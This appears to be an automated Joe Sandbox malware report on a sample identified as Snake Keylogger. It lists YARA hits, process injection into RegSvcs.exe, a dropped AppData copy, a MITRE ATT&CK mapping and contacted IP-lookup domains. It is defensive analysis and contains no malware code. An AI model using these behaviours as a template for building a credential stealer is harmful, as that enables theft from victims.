Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Queries volume information: C:\Users\user\AppData\Roaming\djqdPdQRO.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.djqdPdQRO.exe.38303f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.452f3f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.djqdPdQRO.exe.380f7d8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.450e7d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.djqdPdQRO.exe.38303f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.djqdPdQRO.exe.380f7d8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.452f3f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.450e7d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2317370744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2281225778.000000000380F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2319885033.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2485586490.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2231352999.000000000450E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: djqdPdQRO.exe PID: 6628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1588, type: MEMORYSTR

Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.djqdPdQRO.exe.38303f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.452f3f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.djqdPdQRO.exe.380f7d8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.450e7d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.djqdPdQRO.exe.38303f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.djqdPdQRO.exe.380f7d8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.452f3f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.450e7d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2317370744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2281225778.000000000380F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2231352999.000000000450E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: djqdPdQRO.exe PID: 6628, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.djqdPdQRO.exe.38303f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.452f3f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.djqdPdQRO.exe.380f7d8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.450e7d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.djqdPdQRO.exe.38303f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.djqdPdQRO.exe.380f7d8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.452f3f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.450e7d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2317370744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2281225778.000000000380F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2319885033.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2485586490.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2231352999.000000000450E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: djqdPdQRO.exe PID: 6628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1588, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	311 Process Injection	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	12 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.Nekark
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\djqdPdQRO.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\djqdPdQRO.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.Nekark

Source	Detection	Scanner	Label	Link
http://www.usertrust.	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.96.3	true	false	high
checkip.dyndns.com	158.101.44.242	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
https://reallyfreegeoip.org/xml/8.46.123.189	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org	RegSvcs.exe, 00000007.00000002.2319885033.0000000002890000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.000000000289E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002855000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002863000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002848000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.000000000283A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002E2F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002D37000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	RegSvcs.exe, 00000007.00000002.2319885033.0000000002890000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.000000000289E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002855000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.000000000279B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002863000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002848000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.000000000283A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002870000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002D2B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002E2F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002D37000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	RegSvcs.exe, 00000007.00000002.2319885033.0000000002890000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.000000000289E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002855000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002863000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002848000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.000000000283A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002E2F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002D37000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	file.exe, 00000000.00000002.2230833137.0000000003421000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, djqdPdQRO.exe, 00000009.00000002.2279841804.0000000002799000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002C71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	file.exe, djqdPdQRO.exe.0.dr	false		high
http://checkip.dyndns.org/q	file.exe, 00000000.00000002.2231352999.000000000450E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2317370744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, djqdPdQRO.exe, 00000009.00000002.2281225778.000000000380F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.usertrust.	RegSvcs.exe, 00000007.00000002.2322559999.0000000005EB0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.189$	RegSvcs.exe, 00000007.00000002.2319885033.0000000002890000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.000000000289E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002855000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002863000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002848000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.000000000283A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002E2F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.org	RegSvcs.exe, 00000007.00000002.2319885033.0000000002890000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.000000000289E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002855000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.00000000027BF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002863000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.0000000002848000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.000000000283A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002D4F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002E2F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	file.exe, 00000000.00000002.2231352999.000000000450E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2317370744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2319885033.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, djqdPdQRO.exe, 00000009.00000002.2281225778.000000000380F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2485586490.0000000002D37000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	reallyfreegeoip.org	European Union		13335	CLOUDFLARENETUS	false
158.101.44.242	checkip.dyndns.com	United States		31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583467
Start date and time:	2025-01-02 20:18:48 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@28/12@2/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 98% Number of executed functions: 402 Number of non-executed functions: 19
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 184.28.90.27, 20.12.23.50, 52.149.20.212
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RegSvcs.exe, PID 1588 because it is empty
